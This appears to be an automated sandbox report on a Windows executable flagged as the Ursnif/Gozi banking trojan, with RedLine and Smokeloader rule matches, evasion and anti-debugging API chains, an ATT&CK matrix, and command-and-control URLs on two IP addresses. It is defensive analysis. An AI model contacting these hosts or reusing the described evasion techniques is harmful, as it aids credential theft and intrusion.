      Source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000002.560851312.0000000002D56000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.560764513.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: Process Memory Space: server.exe PID: 5084, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: Process Memory Space: server.exe PID: 5084, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0040110B GetProcAddress,NtCreateSection,memset,
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401459 NtMapViewOfSection,
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02B61C58 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,
      Source: server.exeVirustotal: Detection: 49%
      Source: server.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\server.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02D5C9F7 CreateToolhelp32Snapshot,Module32First,
      Source: C:\Users\user\Desktop\server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@1/2
      Source: C:\Users\user\Desktop\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\server.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
      Source: server.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: server.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: server.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: server.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: server.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: server.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: server.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: C:\vecupeha_kocem\hanowida_tiyecu.pdb source: server.exe

      Data Obfuscation

      barindex
      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
      Detected unpacking (overwrites its own PE header)
      Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02D6B2D4 pushad ; iretd
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02D6408B push edi; ret
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02D5EDFF push 8B8751D0h; retf
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02D6B358 push esp; iretd
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02D6B138 push ss; iretd
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,

      Hooking and other Techniques for Hiding and Protection

      barindex
      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 5084, type: MEMORYSTR
      Source: C:\Users\user\Desktop\server.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\server.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Found evasive API chain (may stop execution after checking system information)
      Source: C:\Users\user\Desktop\server.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
      Source: C:\Users\user\Desktop\server.exeAPI call chain: ExitProcess graph end node
      Source: C:\Users\user\Desktop\server.exeAPI call chain: ExitProcess graph end node
      Source: server.exe, 00000000.00000002.560887520.0000000002DB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWype.comL
      Source: server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW

      Anti Debugging

      barindex
      Found API chain indicative of debugger detection
      Source: C:\Users\user\Desktop\server.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02B6092B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02B60D90 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02D5C2D4 push dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,
      Source: C:\Users\user\Desktop\server.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
      Source: C:\Users\user\Desktop\server.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,
      Source: C:\Users\user\Desktop\server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

      Stealing of Sensitive Information

      barindex
      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 5084, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000003.437821342.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437852108.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437607337.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437902952.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437680280.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437880464.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.436425972.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.561151548.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.437645117.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 5084, type: MEMORYSTR

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts2
      Windows Management Instrumentation      		Path InterceptionPath Interception1
      Virtualization/Sandbox Evasion      		1
      Input Capture      		1
      System Time Discovery      		Remote Services1
      Input Capture      		Exfiltration Over Other Network Medium1
      Ingress Tool Transfer      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts11
      Native API      		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Obfuscated Files or Information      		LSASS Memory11
      Security Software Discovery      		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
      Non-Application Layer Protocol      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
      Software Packing      		Security Account Manager1
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration12
      Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS1
      Process Discovery      		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
      Remote System Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials114
      System Information Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      server.exe49%VirustotalBrowse
      server.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      0.2.server.exe.2cf0000.2.unpack100%AviraHEUR/AGEN.1245293Download File
      0.2.server.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://31.41.44.108/drew/kSoLH6P3P3ScRZ8VG2/ZyGmCU1Si/Pg3By2fxJOOkAR8rwi0H/T_2F0osErSjTF4ug24E/qpC0b0%Avira URL Cloudsafe
      http://5.44.43.17/H0%Avira URL Cloudsafe
      http://31.41.44.108/ows0%Avira URL Cloudsafe
      http://5.44.43.17/0%Avira URL Cloudsafe
      http://5.44.43.17/1%VirustotalBrowse
      http://31.41.44.108/0%Avira URL Cloudsafe
      http://31.41.44.108/7%VirustotalBrowse
      http://5.44.43.17/dows0%Avira URL Cloudsafe
      http://5.44.43.17/drew/L2Ctnat9/M34_2FbYe0ZC9ndvN_2FGmY/27aAwtqf0J/wCDEgzGms_2BItZWy/3Y988SJvsZ8d/G30%Avira URL Cloudsafe
      http://5.44.43.17/drew/L2Ctnat9/M34_2FbYe0ZC9ndvN_2FGmY/27aAwtqf0J/wCDEgzGms_2BItZWy/3Y988SJvsZ8d/G3blEZDMCSE/Bi4DBDrc6fsxs_/2B3aB3ncMi0pp47wsona_/2Bg3i_2FKiTRHGjN/oHTatVB82_2Bul8/TJX3dbVMmJ11Klc61D/Pyd9ldtz9/oHshYCyo8YOqEvONS9ad/fWHuvb04Djokj2GS9tP/hFDYxrH3WbHt3WZEGKZKd7/8Da2SdLCDRHMt/cExDArjC/xj0VJZ2pcmhn5qbmTarHUT8/nHF70Bsig92/tQ.jlk0%Avira URL Cloudsafe
      http://31.41.0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      checklist.skype.com
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://5.44.43.17/drew/L2Ctnat9/M34_2FbYe0ZC9ndvN_2FGmY/27aAwtqf0J/wCDEgzGms_2BItZWy/3Y988SJvsZ8d/G3blEZDMCSE/Bi4DBDrc6fsxs_/2B3aB3ncMi0pp47wsona_/2Bg3i_2FKiTRHGjN/oHTatVB82_2Bul8/TJX3dbVMmJ11Klc61D/Pyd9ldtz9/oHshYCyo8YOqEvONS9ad/fWHuvb04Djokj2GS9tP/hFDYxrH3WbHt3WZEGKZKd7/8Da2SdLCDRHMt/cExDArjC/xj0VJZ2pcmhn5qbmTarHUT8/nHF70Bsig92/tQ.jlktrue
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://31.41.44.108/owsserver.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://31.41.44.108/drew/kSoLH6P3P3ScRZ8VG2/ZyGmCU1Si/Pg3By2fxJOOkAR8rwi0H/T_2F0osErSjTF4ug24E/qpC0bserver.exe, 00000000.00000002.560887520.0000000002DB5000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://5.44.43.17/server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmpfalse
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://5.44.43.17/Hserver.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://checklist.skype.com/drew/t0_2F8jI1aC786/3pDAJvqTmNvXKWVK8YEK3/dSLDX7_2Bak45Arz/NG3260JY92AIOaserver.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          http://31.41.44.108/server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmpfalse
          • 7%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://5.44.43.17/dowsserver.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://5.44.43.17/drew/L2Ctnat9/M34_2FbYe0ZC9ndvN_2FGmY/27aAwtqf0J/wCDEgzGms_2BItZWy/3Y988SJvsZ8d/G3server.exe, 00000000.00000002.560824916.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, server.exe, 00000000.00000002.560887520.0000000002D6C000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://31.41.server.exe, 00000000.00000002.561015752.00000000048DC000.00000004.00000010.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		low

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          5.44.43.17
          		unknownRussian Federation
          		202423MGNHOST-ASRUtrue
          31.41.44.108
          		unknownRussian Federation
          		56577ASRELINKRUfalse

          General Information

          Joe Sandbox Version:37.0.0 Beryl
          Analysis ID:827617
          Start date and time:2023-03-16 07:21:06 +01:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 4m 48s
          Hypervisor based Inspection enabled:false
          Report type:light
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:7
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample file name:server.exe
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@1/0@1/2
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 9.6% (good quality ratio 9.6%)
          • Quality average: 89%
          • Quality standard deviation: 15.4%
          HCA Information:
          • Successful, ratio: 86%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .exe

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASNs

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          No created / dropped files found

          Static File Info

          General

          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):6.1349432521483696
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:server.exe
          File size:307200
          MD5:a4071382a33bb9fa55ff8bf8b111bc39
          SHA1:4eb7f936efe97a88aad9d38452829cd63a3624b2
          SHA256:04234564fe449d51f7e685455fcfafb3b7721a0b7d1551e3a370f579a3530e04
          SHA512:43a54adc868158e342419a4102e4a58a7556a2670f65991a4b71a23ccdc881edd30919a42dfcd2f8730d4e2117663936ea345dc467b43ebb7d48154fb792a19b
          SSDEEP:3072:HntJSBTLHSkg+3ukUWAKi1KPx5pZziCtyF4kWzbmgkONlfQKH:HtJQL1737AKwKJ5pZziB4kvIj
          TLSH:10642B0393E1BD85F92A8B729E1FCAF8765EF5508E09776922289F1F44B0277D263710
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........A.c. .0. .0. .0.r.0. .0.r.0. .0.r.0. .0..j0. .0. .0. .0.r.0. .0.r.0. .0.r.0. .0Rich. .0................PE..L...@r.b...........

          File Icon

          Icon Hash:a4a4809484aca4e2

          Static PE Info

          General

          Entrypoint:0x404d88
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
          DLL Characteristics:TERMINAL_SERVER_AWARE
          Time Stamp:0x62867240 [Thu May 19 16:37:20 2022 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:5
          OS Version Minor:0
          File Version Major:5
          File Version Minor:0
          Subsystem Version Major:5
          Subsystem Version Minor:0
          Import Hash:0011bb4cb3dd2f1183b8c6c4581099ab

          Entrypoint Preview

          Instruction
          call 00007F78A0CADE74h
          jmp 00007F78A0CABEBEh
          mov edi, edi
          push ecx
          mov dword ptr [ecx], 0040124Ch
          call 00007F78A0CADEF7h
          pop ecx
          ret
          mov edi, edi
          push ebp
          mov ebp, esp
          push esi
          mov esi, ecx
          call 00007F78A0CAC028h
          test byte ptr [ebp+08h], 00000001h
          je 00007F78A0CAC049h
          push esi
          call 00007F78A0CAC2F3h
          pop ecx
          mov eax, esi
          pop esi
          pop ebp
          retn 0004h
          mov edi, edi
          push ebp
          mov ebp, esp
          mov ecx, dword ptr [ebp+08h]
          push ebx
          xor ebx, ebx
          push esi
          push edi
          cmp ecx, ebx
          je 00007F78A0CAC049h
          mov edi, dword ptr [ebp+0Ch]
          cmp edi, ebx
          jnbe 00007F78A0CAC05Dh
          call 00007F78A0CAE15Ch
          push 00000016h
          pop esi
          mov dword ptr [eax], esi
          push ebx
          push ebx
          push ebx
          push ebx
          push ebx
          call 00007F78A0CAE0E5h
          add esp, 14h
          mov eax, esi
          jmp 00007F78A0CAC072h
          mov esi, dword ptr [ebp+10h]
          cmp esi, ebx
          jne 00007F78A0CAC046h
          mov byte ptr [ecx], bl
          jmp 00007F78A0CAC01Ch
          mov edx, ecx
          mov al, byte ptr [esi]
          mov byte ptr [edx], al
          inc edx
          inc esi
          cmp al, bl
          je 00007F78A0CAC045h
          dec edi
          jne 00007F78A0CAC035h
          cmp edi, ebx
          jne 00007F78A0CAC052h
          mov byte ptr [ecx], bl
          call 00007F78A0CAE121h
          push 00000022h
          pop ecx
          mov dword ptr [eax], ecx
          mov esi, ecx
          jmp 00007F78A0CAC003h
          xor eax, eax
          pop edi
          pop esi
          pop ebx
          pop ebp
          ret
          push 0000000Ch
          push 0040EE10h
          call 00007F78A0CADBD6h
          and dword ptr [ebp-1Ch], 00000000h
          mov esi, dword ptr [ebp+08h]
          cmp esi, dword ptr [02AE85F0h]
          jnbe 00007F78A0CAC064h
          push 00000004h
          call 00007F78A0CAE27Eh
          pop ecx
          and dword ptr [ebp+00h], 00000000h

          Rich Headers

          Programming Language:
          • [C++] VS2008 build 21022
          • [ASM] VS2008 build 21022
          • [ C ] VS2008 build 21022
          • [IMP] VS2005 build 50727
          • [RES] VS2008 build 21022
          • [LNK] VS2008 build 21022

          Data Directories

          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0xf0bc0x50.text
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x26e90000x1d550.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x27070000xa34.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x11b00x1c.text
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2d700x40.text
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x10000x16c.text
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

          Sections

          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000xe8f00xea00False0.5854867788461539data6.74566977698935IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .data0x100000x26d87440x17200unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rsrc0x26e90000x1d5500x1d600False0.39934341755319147data4.477676246646998IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0x27070000x78780x7a00False0.07479508196721311data0.9257939540365804IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

          Resources

          NameRVASizeTypeLanguageCountry
          RT_CURSOR0x2702bf00x330Device independent bitmap graphic, 48 x 96 x 1, image size 0
